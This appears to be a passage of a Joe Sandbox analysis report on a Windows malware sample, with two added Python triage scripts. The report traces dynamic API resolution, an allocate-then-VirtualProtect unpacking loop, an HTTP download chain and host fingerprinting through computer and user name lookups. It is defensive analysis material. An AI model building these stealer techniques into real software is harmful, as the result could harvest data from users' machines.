14561->14557 14561->14560 14562 c1a8a0 lstrcpy 14561->14562 14562->14561 14564 c17553 GetVolumeInformationA 14563->14564 14565 c1754c 14563->14565 14566 c17591 14564->14566 14565->14564 14567 c175fc GetProcessHeap RtlAllocateHeap 14566->14567 14568 c17619 14567->14568 14569 c17628 wsprintfA 14567->14569 14570 c1a740 lstrcpy 14568->14570 14571 c1a740 lstrcpy 14569->14571 14572 c15da7 14570->14572 14571->14572 14572->13636 14574 c1a7a0 lstrcpy 14573->14574 14575 c04899 14574->14575 15626 c047b0 14575->15626 14577 c048a5 14578 c1a740 lstrcpy 14577->14578 14579 c048d7 14578->14579 14580 c1a740 lstrcpy 14579->14580 14581 c048e4 14580->14581 14582 c1a740 lstrcpy 14581->14582 14583 c048f1 14582->14583 14584 c1a740 lstrcpy 14583->14584 14585 c048fe 14584->14585 14586 c1a740 lstrcpy 14585->14586 14587 c0490b InternetOpenA StrCmpCA 14586->14587 14588 c04944 14587->14588 14589 c04955 14588->14589 14590 c04ecb InternetCloseHandle 14588->14590 15637 c18b60 14589->15637 14592 c04ee8 14590->14592 15632 c09ac0 CryptStringToBinaryA 14592->15632 14593 c04963 15645 c1a920 14593->15645 14596 c04976 14598 c1a8a0 lstrcpy 14596->14598 14604 c0497f 14598->14604 14599 c1a820 2 API calls 14600 c04f05 14599->14600 14602 c1a9b0 4 API calls 14600->14602 14601 c04f27 codecvt 14606 c1a7a0 lstrcpy 14601->14606 14603 c04f1b 14602->14603 14605 c1a8a0 lstrcpy 14603->14605 14607 c1a9b0 4 API calls 14604->14607 14605->14601 14618 c04f57 14606->14618 14608 c049a9 14607->14608 14609 c1a8a0 lstrcpy 14608->14609 14610 c049b2 14609->14610 14611 c1a9b0 4 API calls 14610->14611 14612 c049d1 14611->14612 14613 c1a8a0 lstrcpy 14612->14613 14614 c049da 14613->14614 14615 c1a920 3 API calls 14614->14615 14616 c049f8 14615->14616 14617 c1a8a0 lstrcpy 14616->14617 14619 c04a01 14617->14619 14618->13639 14620 c1a9b0 4 API calls 14619->14620 14621 c04a20 14620->14621 14622 c1a8a0 lstrcpy 14621->14622 14623 c04a29 14622->14623 14624 c1a9b0 4 API calls 14623->14624 14625 c04a48 14624->14625 14626 c1a8a0 lstrcpy 
14625->14626 14627 c04a51 14626->14627 14628 c1a9b0 4 API calls 14627->14628 14629 c04a7d 14628->14629 14630 c1a920 3 API calls 14629->14630 14631 c04a84 14630->14631 14632 c1a8a0 lstrcpy 14631->14632 14633 c04a8d 14632->14633 14634 c04aa3 InternetConnectA 14633->14634 14634->14590 14635 c04ad3 HttpOpenRequestA 14634->14635 14637 c04b28 14635->14637 14638 c04ebe InternetCloseHandle 14635->14638 14639 c1a9b0 4 API calls 14637->14639 14638->14590 14640 c04b3c 14639->14640 14641 c1a8a0 lstrcpy 14640->14641 14642 c04b45 14641->14642 14643 c1a920 3 API calls 14642->14643 14644 c04b63 14643->14644 14645 c1a8a0 lstrcpy 14644->14645 14646 c04b6c 14645->14646 14647 c1a9b0 4 API calls 14646->14647 14648 c04b8b 14647->14648 14649 c1a8a0 lstrcpy 14648->14649 14650 c04b94 14649->14650 14651 c1a9b0 4 API calls 14650->14651 14652 c04bb5 14651->14652 14653 c1a8a0 lstrcpy 14652->14653 14654 c04bbe 14653->14654 14655 c1a9b0 4 API calls 14654->14655 14656 c04bde 14655->14656 14657 c1a8a0 lstrcpy 14656->14657 14658 c04be7 14657->14658 14659 c1a9b0 4 API calls 14658->14659 14660 c04c06 14659->14660 14661 c1a8a0 lstrcpy 14660->14661 14662 c04c0f 14661->14662 14663 c1a920 3 API calls 14662->14663 14664 c04c2d 14663->14664 14665 c1a8a0 lstrcpy 14664->14665 14666 c04c36 14665->14666 14667 c1a9b0 4 API calls 14666->14667 14668 c04c55 14667->14668 14669 c1a8a0 lstrcpy 14668->14669 14670 c04c5e 14669->14670 14671 c1a9b0 4 API calls 14670->14671 14672 c04c7d 14671->14672 14673 c1a8a0 lstrcpy 14672->14673 14674 c04c86 14673->14674 14675 c1a920 3 API calls 14674->14675 14676 c04ca4 14675->14676 14677 c1a8a0 lstrcpy 14676->14677 14678 c04cad 14677->14678 14679 c1a9b0 4 API calls 14678->14679 14680 c04ccc 14679->14680 14681 c1a8a0 lstrcpy 14680->14681 14682 c04cd5 14681->14682 14683 c1a9b0 4 API calls 14682->14683 14684 c04cf6 14683->14684 14685 c1a8a0 lstrcpy 14684->14685 14686 c04cff 14685->14686 14687 c1a9b0 4 API calls 14686->14687 14688 c04d1f 14687->14688 14689 c1a8a0 lstrcpy 14688->14689 

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  APIs
                  • GetProcAddress.KERNEL32(74DD0000,01798E38), ref: 00C198A1
                  • GetProcAddress.KERNEL32(74DD0000,01798DA8), ref: 00C198BA
                  • GetProcAddress.KERNEL32(74DD0000,01798F88), ref: 00C198D2
                  • GetProcAddress.KERNEL32(74DD0000,01798EB0), ref: 00C198EA
                  • GetProcAddress.KERNEL32(74DD0000,01798D90), ref: 00C19903
                  • GetProcAddress.KERNEL32(74DD0000,01799480), ref: 00C1991B
                  • GetProcAddress.KERNEL32(74DD0000,01783DC0), ref: 00C19933
                  • GetProcAddress.KERNEL32(74DD0000,01783EE0), ref: 00C1994C
                  • GetProcAddress.KERNEL32(74DD0000,01798F70), ref: 00C19964
                  • GetProcAddress.KERNEL32(74DD0000,01798DC0), ref: 00C1997C
                  • GetProcAddress.KERNEL32(74DD0000,01798E80), ref: 00C19995
                  • GetProcAddress.KERNEL32(74DD0000,01798D78), ref: 00C199AD
                  • GetProcAddress.KERNEL32(74DD0000,01783E80), ref: 00C199C5
                  • GetProcAddress.KERNEL32(74DD0000,01798FA0), ref: 00C199DE
                  • GetProcAddress.KERNEL32(74DD0000,01798E50), ref: 00C199F6
                  • GetProcAddress.KERNEL32(74DD0000,01783DA0), ref: 00C19A0E
                  • GetProcAddress.KERNEL32(74DD0000,01798FB8), ref: 00C19A27
                  • GetProcAddress.KERNEL32(74DD0000,01799030), ref: 00C19A3F
                  • GetProcAddress.KERNEL32(74DD0000,01783FE0), ref: 00C19A57
                  • GetProcAddress.KERNEL32(74DD0000,01798E68), ref: 00C19A70
                  • GetProcAddress.KERNEL32(74DD0000,01783E40), ref: 00C19A88
                  • LoadLibraryA.KERNEL32(01798FD0,?,00C16A00), ref: 00C19A9A
                  • LoadLibraryA.KERNEL32(01798EC8,?,00C16A00), ref: 00C19AAB
                  • LoadLibraryA.KERNEL32(01798E08,?,00C16A00), ref: 00C19ABD
                  • LoadLibraryA.KERNEL32(01798F10,?,00C16A00), ref: 00C19ACF
                  • LoadLibraryA.KERNEL32(01798E98,?,00C16A00), ref: 00C19AE0
                  • GetProcAddress.KERNEL32(75A70000,01798EF8), ref: 00C19B02
                  • GetProcAddress.KERNEL32(75290000,01798DF0), ref: 00C19B23
                  • GetProcAddress.KERNEL32(75290000,01799018), ref: 00C19B3B
                  • GetProcAddress.KERNEL32(75BD0000,01798FE8), ref: 00C19B5D
                  • GetProcAddress.KERNEL32(75450000,01783E60), ref: 00C19B7E
                  • GetProcAddress.KERNEL32(76E90000,017994F0), ref: 00C19B9F
                  • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00C19BB6
                  Strings
                  • NtQueryInformationProcess, xrefs: 00C19BAA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoad
                  • String ID: NtQueryInformationProcess
                  • API String ID: 2238633743-2781105232
                  • Opcode ID: ca43fa89cc2a9b5b330d7772668f414cb1b356585cdd3751b5aaf3f927d381fa
                  • Instruction ID: 62377313154dfd331d34e2b5149191f8c77e246becf1d9cec186d95303b68b2b
                  • Opcode Fuzzy Hash: ca43fa89cc2a9b5b330d7772668f414cb1b356585cdd3751b5aaf3f927d381fa
                  • Instruction Fuzzy Hash: 68A17CBD5C02009FE368EFAAED8C95637F9F74E32170D453AA605E3224D639944BDB12

                  Control-flow Graph (image; basic blocks and edges recovered from the graph text: allocate, loop, then VirtualProtect)
                  • c045c0-c04695: RtlAllocateHeap, then edge to c046a0
                  • c046a0-c046a6: loop head, branches to c046ac or to c0474f
                  • c046ac-c0474a: loop body, edge back to c046a0
                  • c0474f-c047a9: loop exit, VirtualProtect
                  APIs
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00C0460F
                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00C0479C
                  Strings
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs (30 references to the same filler sentence, in six runs of five spaced 0x0B bytes apart): 00C045C7, 00C045D2, 00C045DD, 00C045E8, 00C045F3, 00C04617, 00C04622, 00C0462D, 00C04638, 00C04643, 00C04657, 00C04662, 00C0466D, 00C04678, 00C04683, 00C046AC, 00C046B7, 00C046C2, 00C046CD, 00C046D8, 00C04713, 00C0471E, 00C04729, 00C04734, 00C0473F, 00C0474F, 00C0475A, 00C04765, 00C04770, 00C0477B
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateHeapProtectVirtual
                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (this one sentence repeated, "$"-joined, once for each xref listed under Strings above)
                  • API String ID: 1542196881-2218711628
                  • Opcode ID: 3fad424055591739b944eb445b88f1e5909aece7ad7e7bfaf4d0ad806cb7a9d5
                  • Instruction ID: 4bb59e18992cf063796c4fb23d446b1b53bf2415da6e09845dbf6e8493358560
                  • Opcode Fuzzy Hash: 3fad424055591739b944eb445b88f1e5909aece7ad7e7bfaf4d0ad806cb7a9d5
                  • Instruction Fuzzy Hash: DA41F6707CA6747EC728BBA7B86FEAF77565F46B20F505064F80852682CBB07500A736
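The control-flow graphs on this page survive only as the graph's text: a node id, an address range, zero or more API names (with an optional "* N" multiplicity), and id->id edges. The following Python is an added example, not code from Joe Sandbox or from the analysed sample; it parses that text, finds loops as DFS back edges, and lists the API calls per block, so the allocate / loop / VirtualProtect shape of the function above and the one-resolve-block-per-module shape of the import resolver further down can be checked mechanically rather than by eye. The first two embedded graph strings are copied from this page; the third is a constructed fragment in the same notation that only exercises the multiplicity syntax.

```python
"""Parse the text form of a Joe Sandbox control-flow graph and summarise it.

Added example: not code from Joe Sandbox or from the analysed sample.
Input format, as it appears on the report page:
    control_flow_graph <id> <start>-<end> [Api [* N]]... <id>-><id> ...
"""
import re

RANGE = re.compile(r"^[0-9a-f]+-[0-9a-f]+$")


def parse_cfg(text):
    """Return (nodes, edges); nodes maps id -> {"range": str, "apis": [(name, count)]}."""
    tokens = text.split()
    if not tokens or tokens[0] != "control_flow_graph":
        raise ValueError("not a control_flow_graph line")
    nodes, edges, cur, i = {}, [], None, 1
    while i < len(tokens):
        tok = tokens[i]
        if "->" in tok:                                   # edge: "764->781"
            a, b = tok.split("->")
            edges.append((int(a), int(b)))
        elif tok.isdigit() and i + 1 < len(tokens) and RANGE.match(tokens[i + 1]):
            cur = int(tok)                                # node: "764 c045c0-c04695"
            nodes[cur] = {"range": tokens[i + 1], "apis": []}
            i += 1
        elif tok == "*":                                  # multiplicity: "GetProcAddress * 43"
            name, _ = nodes[cur]["apis"][-1]
            nodes[cur]["apis"][-1] = (name, int(tokens[i + 1]))
            i += 1
        else:                                             # API name inside the current block
            nodes[cur]["apis"].append((tok, 1))
        i += 1
    return nodes, edges


def back_edges(nodes, edges):
    """DFS from the first-listed block; an edge into a block still on the DFS stack is a loop."""
    succ = {n: [] for n in nodes}
    for a, b in edges:
        succ.setdefault(a, []).append(b)
    state, loops = {}, []

    def visit(u):
        state[u] = "open"
        for v in succ.get(u, []):
            if state.get(v) == "open":
                loops.append((u, v))
            elif v not in state:
                visit(v)
        state[u] = "done"

    visit(next(iter(nodes)))
    return loops


def summarize(text):
    """Block count, total API calls (with multiplicities), loops, and the API list in block order."""
    nodes, edges = parse_cfg(text)
    apis = [(nodes[n]["range"], name, count) for n in nodes for name, count in nodes[n]["apis"]]
    return {
        "blocks": len(nodes),
        "api_calls": sum(count for _, _, count in apis),
        "loops": back_edges(nodes, edges),
        "apis": apis,
    }


# Copied from this report page: the heap-allocate / loop / VirtualProtect function at c045c0.
CFG_UNPACK = ("control_flow_graph 764 c045c0-c04695 RtlAllocateHeap 781 c046a0-c046a6 "
              "782 c046ac-c0474a 783 c0474f-c047a9 VirtualProtect 764->781 781->782 "
              "781->783 782->781")
# Copied from this report page: the GetComputerNameA function at c178e0 (no loop).
CFG_HOSTNAME = ("control_flow_graph 1275 c178e0-c17937 GetProcessHeap RtlAllocateHeap "
                "GetComputerNameA 1276 c17942-c17945 1277 c17939-c1793e 1275->1276 "
                "1275->1277 1278 c17962-c17972 1276->1278 1277->1278")
# Constructed fragment in the same notation, to exercise the "* N" multiplicity form
# used by the import-resolver graph on this page (not a full copy of that graph).
CFG_RESOLVER = ("control_flow_graph 633 c19c10-c19c1a 634 c19c20-c1a031 GetProcAddress * 43 "
                "635 c1a036-c1a0ca LoadLibraryA * 8 633->634 633->635 634->635")

if __name__ == "__main__":
    for label, cfg in (("unpack", CFG_UNPACK), ("hostname", CFG_HOSTNAME), ("resolver", CFG_RESOLVER)):
        print(label, summarize(cfg))
```

For the function above the summary reports one loop (782 back to 781) with RtlAllocateHeap before it and VirtualProtect after it; the hostname function reports no loop. Run the same summariser over the long graph line of the import resolver to get its 104 GetProcAddress and 8 LoadLibraryA calls without counting by hand.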

                  Control-flow Graph (image; no graph text was captured for this function)

                  APIs
                    • Part of subcall function 00C1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C1A7E6
                    • Part of subcall function 00C047B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C04839
                    • Part of subcall function 00C047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C04849
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                  • InternetOpenA.WININET(00C20DFE,00000001,00000000,00000000,00000000), ref: 00C062E1
                  • StrCmpCA.SHLWAPI(?,0179ED68), ref: 00C06303
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C06335
                  • HttpOpenRequestA.WININET(00000000,GET,?,0179EC60,00000000,00000000,00400100,00000000), ref: 00C06385
                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00C063BF
                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C063D1
                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00C063FD
                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00C0646D
                  • InternetCloseHandle.WININET(00000000), ref: 00C064EF
                  • InternetCloseHandle.WININET(00000000), ref: 00C064F9
                  • InternetCloseHandle.WININET(00000000), ref: 00C06503
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: the same 13 dumps and IDA snapshot (hcaresult_0_2_c00000_file.jbxd) as listed above
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                  • String ID: ERROR$ERROR$GET
                  • API String ID: 3749127164-2509457195
                  • Opcode ID: daa4b4714cbcdf0b9d4fe9f740576399e7b0e654783b03742d6c23e4c980c667
                  • Instruction ID: d33f676e175e91c2ac952602473127916085c76cffa16a5fa818840d2b34563b
                  • Opcode Fuzzy Hash: daa4b4714cbcdf0b9d4fe9f740576399e7b0e654783b03742d6c23e4c980c667
                  • Instruction Fuzzy Hash: D7719075A00218AFEB24DFA0DC49BEE7778FB05710F108068F1096B1D0DBB46A89DF91

                  Control-flow Graph (image; basic blocks and edges recovered from the graph text)
                  • c178e0-c17937: GetProcessHeap, RtlAllocateHeap, GetComputerNameA; branches to c17939 or c17942
                  • c17939-c1793e and c17942-c17945: the two arms of that branch, both leading to c17962
                  • c17962-c17972: common exit
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C17910
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00C17917
                  • GetComputerNameA.KERNEL32(?,00000104), ref: 00C1792F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: the same 13 dumps and IDA snapshot (hcaresult_0_2_c00000_file.jbxd) as listed above
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateComputerNameProcess
                  • String ID:
                  • API String ID: 1664310425-0
                  • Opcode ID: c466d64f8414c20ffe3df0042cd1f5432b0967aace04ad1f1c3fec0adeda4dda
                  • Instruction ID: d3b8e08852f0edbbffecd0081106c2dadff61c144cdb78addecab7230d0d6ceb
                  • Opcode Fuzzy Hash: c466d64f8414c20ffe3df0042cd1f5432b0967aace04ad1f1c3fec0adeda4dda
                  • Instruction Fuzzy Hash: E501A9B1948204EFC704DF95DD49BAEBBB8F705B21F10426AF545F3780C37459458BA1
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00C011B7), ref: 00C17880
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00C17887
                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00C1789F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: the same 13 dumps and IDA snapshot (hcaresult_0_2_c00000_file.jbxd) as listed above
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateNameProcessUser
                  • String ID:
                  • API String ID: 1296208442-0
                  • Opcode ID: eb036e72d0b8209b893796a1fd902799a597d03a5b0dc017e3ffd4940a120c58
                  • Instruction ID: cba6bc4138df486fb9cefa55838a6e181ad46f132824d0605f7db29f47b64b1a
                  • Opcode Fuzzy Hash: eb036e72d0b8209b893796a1fd902799a597d03a5b0dc017e3ffd4940a120c58
                  • Instruction Fuzzy Hash: 7FF04FB5944208AFC714DF99DD49FAEBBB8EB09721F10026AFA05A2680C77415458BA1
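A practitioner usually wants these per-function API listings turned into findings without reading every record. The Python below is an added example, not part of the Joe Sandbox report or of the sample; it parses bullet lines in the format used above and reports three things: the WinINet download chain (InternetOpenA through InternetReadFile, in order, with other calls allowed in between), the GetProcAddress burst of the import resolver listed further down (43 calls on one module handle before the first LoadLibraryA), and the GetComputerNameA / GetUserNameA pair with its 0x104-byte buffers. The lines copied from this page are marked as such; the GetProcAddress and LoadLibraryA lines are generated stand-ins with synthetic string-pointer and ref addresses, and the burst threshold of 20 is this example's own assumption.

```python
"""Triage the per-function "APIs" listings of a Joe Sandbox report.

Added example: not code from Joe Sandbox or from the analysed sample.  It parses
bullet lines exactly as they appear on this page and raises three findings that
matter for a stealer: an ordered WinINet download chain, a burst of GetProcAddress
calls against the same module handle (dynamic import resolution), and host
fingerprinting via GetComputerNameA / GetUserNameA.  Rule names and the
threshold are this example's own choices.
"""
import re
from collections import Counter

# "• Name.MODULE(args), ref: 00C0646D", optionally prefixed by
# "Part of subcall function 00C047B0: " as the report does for inlined callees.
API_LINE = re.compile(
    r"(?:Part of subcall function (?P<caller>[0-9A-F]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<module>[A-Z0-9]+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-F]{8})"
)


def parse_calls(text):
    """Return [(name, module, args, ref, caller)] in listing order."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if m:
            args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
            calls.append((m.group("name"), m.group("module"), args, m.group("ref"), m.group("caller")))
    return calls


WININET_CHAIN = ["InternetOpenA", "InternetConnectA", "HttpOpenRequestA",
                 "HttpSendRequestA", "InternetReadFile"]


def find_chain(calls, chain=WININET_CHAIN):
    """Ordered-subsequence match; other calls may sit in between. Returns the refs or None."""
    refs = []
    for name, _, _, ref, _ in calls:
        if name == chain[len(refs)]:
            refs.append(ref)
            if len(refs) == len(chain):
                return refs
    return None


def getprocaddress_burst(calls, threshold=20):
    """Count GetProcAddress per module handle (first argument) and LoadLibraryA calls."""
    per_handle = Counter(args[0] for name, _, args, _, _ in calls
                         if name == "GetProcAddress" and args)
    loads = sum(1 for name, *_ in calls if name == "LoadLibraryA")
    total = sum(per_handle.values())
    return {"total": total, "per_handle": dict(per_handle),
            "loadlibrary": loads, "flag": total >= threshold}


def host_fingerprint(calls):
    """Computer and user name read into a 0x104-byte (MAX_PATH-sized) buffer."""
    hits = {name: args for name, _, args, _, _ in calls
            if name in ("GetComputerNameA", "GetUserNameA")}
    return {"apis": sorted(hits),
            "buffer_0x104": bool(hits) and all("00000104" in a for a in hits.values())}


def triage(text):
    calls = parse_calls(text)
    return {"wininet_chain": find_chain(calls),
            "getprocaddress": getprocaddress_burst(calls),
            "host_fingerprint": host_fingerprint(calls)}


# Lines copied from this report page (download function around c062xx, fingerprint functions at c178xx).
SAMPLE_LINES = [
    "• Part of subcall function 00C047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C04849",
    "• InternetOpenA.WININET(00C20DFE,00000001,00000000,00000000,00000000), ref: 00C062E1",
    "• StrCmpCA.SHLWAPI(?,0179ED68), ref: 00C06303",
    "• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C06335",
    "• HttpOpenRequestA.WININET(00000000,GET,?,0179EC60,00000000,00000000,00400100,00000000), ref: 00C06385",
    "• HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C063D1",
    "• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00C0646D",
    "• GetComputerNameA.KERNEL32(?,00000104), ref: 00C1792F",
    "• GetUserNameA.ADVAPI32(00000104,00000104), ref: 00C1789F",
]
# Constructed to mirror the import resolver on this page: 43 GetProcAddress calls on handle
# 74DD0000, then 8 LoadLibraryA, then 5 on 75290000.  The string-pointer arguments and
# ref addresses are synthetic stand-ins, not the page's values.
SAMPLE_LINES += [f"• GetProcAddress.KERNEL32(74DD0000,{0x01799C88 + 0x18 * i:08X}), ref: {0x00C19C2D + 0x18 * i:08X}"
                 for i in range(43)]
SAMPLE_LINES += [f"• LoadLibraryA.KERNEL32({0x0179D470 + 0x18 * i:08X},?), ref: {0x00C1A03D + 0x12 * i:08X}"
                 for i in range(8)]
SAMPLE_LINES += [f"• GetProcAddress.KERNEL32(75290000,{0x0179DFC0 + 0x18 * i:08X}), ref: {0x00C1A0DA + 0x18 * i:08X}"
                 for i in range(5)]
SAMPLE = "\n".join(SAMPLE_LINES)

if __name__ == "__main__":
    print(triage(SAMPLE))
```

The chain matcher is an ordered-subsequence check rather than an exact sequence, because the listing interleaves unrelated calls (StrCmpCA, InternetSetOptionA, HttpQueryInfoA) between the WinINet steps; the handle grouping in the GetProcAddress rule is what distinguishes a resolver that walks one module's export table from ordinary scattered GetProcAddress use.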
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: the same 13 dumps and IDA snapshot (hcaresult_0_2_c00000_file.jbxd) as listed above
                  Yara matches
                  Similarity
                  • API ID: ExitInfoProcessSystem
                  • String ID:
                  • API String ID: 752954902-0
                  • Opcode ID: 7da37c9c5d355b2b1db1ba4fa35bf792e320e4c743ce4e12fb58a883f5e78bb3
                  • Instruction ID: 0c27100df03e4ffa27c8593ab27de59fcb56f84ef0a9f65b6b833f88735d2864
                  • Opcode Fuzzy Hash: 7da37c9c5d355b2b1db1ba4fa35bf792e320e4c743ce4e12fb58a883f5e78bb3
                  • Instruction Fuzzy Hash: 19D05E7894030CDFCB14DFE1D84D6EDBB78FB09321F040565ED0572340EA306486CAA6

                  Control-flow Graph (image; basic blocks and edges recovered from the graph text)
                  • c19c10-c19c1a: entry; either runs c19c20 or skips to c1a036
                  • c19c20-c1a031: GetProcAddress * 43
                  • c1a036-c1a0ca: LoadLibraryA * 8
                  • c1a0cc-c1a141: GetProcAddress * 5; c1a153-c1a211: * 8; c1a21f-c1a293: * 5; c1a2a5-c1a332: * 6; c1a344-c1a41a: * 9; c1a428-c1a49d: * 5; c1a4ab-c1a4d7: * 2; c1a4e5-c1a510: * 2; c1a522-c1a60d: * 10; c1a61b-c1a678: * 4; c1a686-c1a699: * 1; c1a6a7-c1a703: * 4. Each of these resolve blocks sits behind a short check block that either enters it or skips to the next check.
                  • c1a708-c1a709: exit
                  In total the function makes 104 GetProcAddress calls and 8 LoadLibraryA calls; the API list below shows the first 43 against module handle 74DD0000 before the first LoadLibraryA, then 5 against 75290000 and 8 against 73560000 once the libraries are loaded.
                  APIs
                  • GetProcAddress.KERNEL32(74DD0000,01784020), ref: 00C19C2D
                  • GetProcAddress.KERNEL32(74DD0000,01783E00), ref: 00C19C45
                  • GetProcAddress.KERNEL32(74DD0000,01799C88), ref: 00C19C5E
                  • GetProcAddress.KERNEL32(74DD0000,01799CA0), ref: 00C19C76
                  • GetProcAddress.KERNEL32(74DD0000,01799CB8), ref: 00C19C8E
                  • GetProcAddress.KERNEL32(74DD0000,01799CD0), ref: 00C19CA7
                  • GetProcAddress.KERNEL32(74DD0000,0178B8E8), ref: 00C19CBF
                  • GetProcAddress.KERNEL32(74DD0000,01799BF8), ref: 00C19CD7
                  • GetProcAddress.KERNEL32(74DD0000,01799DA8), ref: 00C19CF0
                  • GetProcAddress.KERNEL32(74DD0000,01799B38), ref: 00C19D08
                  • GetProcAddress.KERNEL32(74DD0000,01799D00), ref: 00C19D20
                  • GetProcAddress.KERNEL32(74DD0000,01783F80), ref: 00C19D39
                  • GetProcAddress.KERNEL32(74DD0000,01783F40), ref: 00C19D51
                  • GetProcAddress.KERNEL32(74DD0000,01783F60), ref: 00C19D69
                  • GetProcAddress.KERNEL32(74DD0000,01783EC0), ref: 00C19D82
                  • GetProcAddress.KERNEL32(74DD0000,01799D18), ref: 00C19D9A
                  • GetProcAddress.KERNEL32(74DD0000,01799D30), ref: 00C19DB2
                  • GetProcAddress.KERNEL32(74DD0000,0178B910), ref: 00C19DCB
                  • GetProcAddress.KERNEL32(74DD0000,01784000), ref: 00C19DE3
                  • GetProcAddress.KERNEL32(74DD0000,01799DC0), ref: 00C19DFB
                  • GetProcAddress.KERNEL32(74DD0000,01799AD8), ref: 00C19E14
                  • GetProcAddress.KERNEL32(74DD0000,01799B50), ref: 00C19E2C
